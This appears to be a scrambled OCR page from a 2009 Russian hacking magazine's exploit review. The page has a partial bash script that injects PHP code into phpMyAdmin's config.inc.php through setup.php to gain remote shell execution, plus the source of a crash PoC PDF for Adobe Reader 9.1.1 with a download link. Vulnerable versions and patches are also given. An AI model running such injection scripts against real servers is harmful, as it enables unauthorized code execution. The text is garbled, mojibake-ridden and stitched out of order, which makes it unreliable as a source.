ÃÂÃÂ•ÃÂ¡ÃÂ›ÃÂ£ÃÂ§ÃÂÃÂ™ÃÂÃÂž CUDA ÃÂ˜ÃÂ”ÃÂ•ÃÂœ? phpMyAdmin - Xakep Online

More documents

Recommendations

Info

взлом обзор эксплоитов обзор эксплоитов обзор эксплоитов ор плоитов ОШИБКА ТУПАЯ ДО БОЛИ ор плоитов ор плоитов СЕГОДНЯ НЕ НАШ ДЕНЬ. ПРИДЕТСЯ ПИСАТЬ АВТОСКАНЕР... flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html" echo "[+] attempting to inject phpinfo() ..." curl -ks -b $2 -d "$postdata" --url "$3/scripts/setup. php" >/dev/null if curl -ks --url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null then curl -ks --url "$3/config/config.inc.php" >$flag echo "[+] success! phpinfo() injected successfully! output saved on $flag" curl -ks -b $2 -d $postdata2 --url "$3/scripts/ setup.php» >/dev/null echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:" echo " $3/config/config.inc.php?c=ls+-l+/" echo " $3/config/config.inc.php?p=phpinfo();" echo " please send any feedback/improvements for this script to"\ "unknown.pentestergmail.com" else >> Brief Очередная темная лошадка на арене PoC появилась в начале июня. На этот раз, по заявлениям неизвестных багоискателей, обнаружилась брешь в Adobe Acrobat аж до версии 9.1.1. В паблик выложили лишь PoC-эксплойт, при запуске которого ничего не происходит. Точнее, происходит — вываливается среда, из которой был запущен PoC. Если это браузер — закрываются все вкладки IE/Firefox/Opera/Mozilla. Если это сам Acrobat Reader — то и он вылетает. Короче говоря, сплойт действительно сшибает с ног Adobe Reader. Почему же так происходит? Чтобы это выяснить, бережно скачаем PDF’ку каким-нибудь сторонним менеджером (я использовал wget на удаленном сервере) и присмотримся к исходному коду файла. Для простоты восприятия, помещаю его ниже. %PDF-1.4 % 4 0 objendobj 5 0 objstream endstream endobj 3 0 objendobj 2 0 objendobj НЕМЕДЛЕННОЕ ОБНОВЛЕНИЕ ор плоитов echo "[+] no luck injecting to $3/config/config.inc. php :(" exit fi } Если ты не поленишься написать простенький PHP-парсер передаваемых строк, то получишь посимвольную картину инжекта. Полный код эксплойта можно скачать по ссылке securitylab.ru/poc/ extra/381413.php. ор плоитов >> Targets: Уязвимыми версиями <strong>phpMyAdmin</strong> являются 2.11.x до 2.11.9.5 и 3.x до 3.1.3.1 (все релизы достаточно новые и выпускались до апреля этого года). ор плоитов >> Solution Нависшую угрозу безопасности решит либо удаление файла «/scripts/ setup.php», либо изолирование каталога «/config» вне Web-директории, либо (самый предпочтительный вариант) обновление <strong>phpMyAdmin</strong> до свежей версии. Последнее можно осуществить с официальной локации: sourceforge.net/projects/phpmyadmin. 03 ADOBE ACROBAT 9.1.1 STACK OVERFLOW CRASH POC EXPLOIT ор плоитов 050 XÀÊÅÐ 07 /127/ 09
обзор эксплоитов обзор эксплоитов обзор эксплоитов >> взлом обзор эксплоитов НА ВОЛОСКЕ ОТ СМЕРТИ... 6 0 objendobj 1 0 objendobj xref 0 7 0000000000 65535 f 0000020392 00000 n 0000000193 00000 n 0000000098 00000 n 0000000015 00000 n 0000000052 00000 n 0000000245 00000 n trailer > startxref 20452 %%EOF Смотрим и видим, что в секции init есть странный alert, содержащий 4098 байт мусора. Очевидно, что он и стал причиной падения. Как говорится, доверяй, но проверяй, поэтому я отредактировал файл, оставив лишь 10 байт «мусора». В итоге, PDF’ка открылась без ошибок. Каков же вывод? Все просто, функция «app.alert()» не содержит должную проверку на переполнение, в итоге, мы имеем безобидный DoS. Подчеркиваю, именно безобидный, поскольку в приватных кругах наверняка ходит эксплойт, реализующий выполнение произвольного системного кода, который впоследствии будет использоваться в различных связках для «пробива» приватных троянцев. Поэтому мотай информацию на ус и немедленно обновляйся. XÀÊÅÐ 07 /127/ 09 ТЕХНИЧЕСКОЕ ОПИСАНИЕ БАГА В LIBSNDFILE >> Exploit Вбей в адресную строку «securitylab.ru/_download/exploits/2009/05/ adobe-reader-dos.pdf» и увидишь... аварийное закрытие браузера :). >> Targets Уязвимыми являются все версии Acrobat Reader, включая релиз 9.1.1. Помни, что если ты жмякнешь на ссылку с ядовитым PDF-файлом, захлопнется и программа, которая инициировала его открытие. >> Solution Обновляй читалку на официальном сайте «get.adobe.com/reader». Тем самым ты защитишь свой компьютер от непрошеных гостей. 051
Page 1 and 2: ЛУЧШИЙ СОФТ ДЛЯ БРУ
Page 3 and 4: НОВЫЕ СПОСОБЫ ВЗЛО
Page 5 and 6: The 2009 SourceForge.net Community
Page 8: PC27 >> meganews Miranda 0.8 бол
Page 12 and 13: meganews Чистки на RapidSha
Page 14 and 15: PC27 >> meganews iPhone ускор
Page 16 and 17: meganews PC27 Ябблоки без
Page 19 and 20: Сплойтпак для твое
Page 21 and 22: ferrum 19000 руб. 10000 руб.
Page 23 and 24: FTP, МБАЙТ/С >> ferrum ZyXEL
Page 26 and 27: pc_zone The 2009 SourceForge.net Co
Page 28 and 29: pc_zone INFO The 2009 SourceForge.n
Page 30 and 31: pc_zone ГЛЕБ ПОЛИКАРПО
Page 32 and 33: pc_zone СРАВНЕНИЕ ПРОИ
Page 34 and 35: 10 TOOLS 10 TOOLS >> pc_zone 10 TOO
Page 36 and 37: pc_zone 10 TOOLS 10 TOOLS 10 TOOLS
Page 38 and 39: В ГОСТЯХ У СУППОРТА
Page 40 and 41: С ЭТОГО САЙТА НАЧИН
Page 42 and 43: взлом RAND IS NOT RAND RAND IS
Page 44: RAND IS NOT RAND RAND IS NOT RAND >
Page 47 and 48: взлом 1. Сливаем сор
Page 49 and 50: взлом № 6 ЗАДАЧА: СО
Page 51: обзор эксплоитов о
Page 55 and 56: обзор эксплоитов о
Page 57 and 58: взлом CRACKME ОТЧАЯННО
Page 59 and 60: взлом LOG EXPLOIT: XMB 1.9.11
Page 61 and 62: взлом ДАМП ПАМЯТИ У
Page 63 and 64: взлом ЭТО И ЕСТЬ PHPIN
Page 65 and 66: взлом curl "http://site.com/in
Page 67 and 68: взлом МЕТОД СРАБОТ
Page 69 and 70: взлом ИСПОЛЬЗОВАНИ
Page 71 and 72: Реклама
Page 73 and 74: взлом в наличии nginx,
Page 75 and 76: сцена ДЖОЭЛ И ПРОГР
Page 77 and 78: сцена УЮТНЫЙ БЛОЖЕ
Page 79 and 80: unixoid ФАЙЛОВАЯ СИСТЕ
Page 81 and 82: unixoid ДВЕ РАЗНЫЕ ГРА
Page 84 and 85: unixoid БЛОКИ С ПРЯМОЙ
Page 86 and 87: unixoid СТРУКТУРА КАТА
Page 88 and 89: ++++ >> coding ++++ ++++ ++++ 1 2 3
Page 90 and 91: ++++ >> coding ++++ ++++ ++++ ++++
Page 92 and 93: ++++ >> coding ++++ ++++ ++++ РО
Page 94 and 95: ++++ >> coding ++++ ++++ ++++ ++++
Page 96 and 97: ++++ >> coding ++++ ++++ ИГОРЬ
Page 98 and 99: ++++ >> coding ++++ ++++ ++++ ++++
Page 100: ++++ ++++ ++++ ++++ ++++ ++++ ++++
Page 103 and 104:
coding вводить их в ка
Page 105 and 106:
ПОДПИСКА В РЕДАКЦИ
Page 107 and 108:
phreaking «ПИШЕМ НА СИ П
Page 109 and 110:
phreaking ЕСЛИ НАУЧИШЬС
Page 112 and 113:
SYN/ACK СЕРГЕЙ «GRINDER» Я
Page 114 and 115:
SYN/ACK USERGATE ПОЗВОЛЯЕТ
Page 116 and 117:
ХАКЕР.PRO SYN/ACK ПОЧТОВ
Page 118 and 119:
SYN/ACK СЕРГЕЙ ЯРЕМЧУК
Page 120 and 121:
SYN/ACK В WIN2K8 GPO ПО УМОЛ
Page 122 and 123:
SYN/ACK NATHAN BINKERT / NAT@SYNACK
Page 124 and 125:
SYN/ACK ЕВГЕНИЙ ЗОБНИН
Page 126 and 127:
SYN/ACK 1:0 prio 1:0 htb default 15
Page 128 and 129:
SYN/ACK ЕВГЕНИЙ ЗОБНИН
Page 130 and 131:
SYN/ACK ВЫБОР ПАРАМЕТР
Page 132 and 133:
ХАКЕР.PRO SYN/ACK ОСНОВН
Page 134 and 135:
units АЛЕКСАНДР ЛОЗОВ
Page 136 and 137:
units ЭЛЕКТРОСУДОРОЖ
Page 138 and 139:
units E-MAIL UNITED: НА ПИСЬ
Page 140 and 141:
59% HEALTH 59% HEALTH 13% ARMOR Д
Page 142 and 143:
units МАГ / ICQ 884888, HTTP://W
Page 144 and 145:
units A: Действительно
Page 146:
http:// WWW2 ПОЛУЧИТЬ IP-А
show all

ÃÂÃÂ•ÃÂ¡ÃÂ›ÃÂ£ÃÂ§ÃÂÃÂ™ÃÂÃÂž CUDA ÃÂ˜ÃÂ”ÃÂ•ÃÂœ? phpMyAdmin - Xakep Online

Create successful ePaper yourself

Delete template?

Save as template?

ÃÂÃÂ•ÃÂ¡ÃÂ›ÃÂ£ÃÂ§ÃÂÃÂ™ÃÂÃÂž CUDA ÃÂ˜ÃÂ”ÃÂ•ÃÂœ? phpMyAdmin - Xakep Online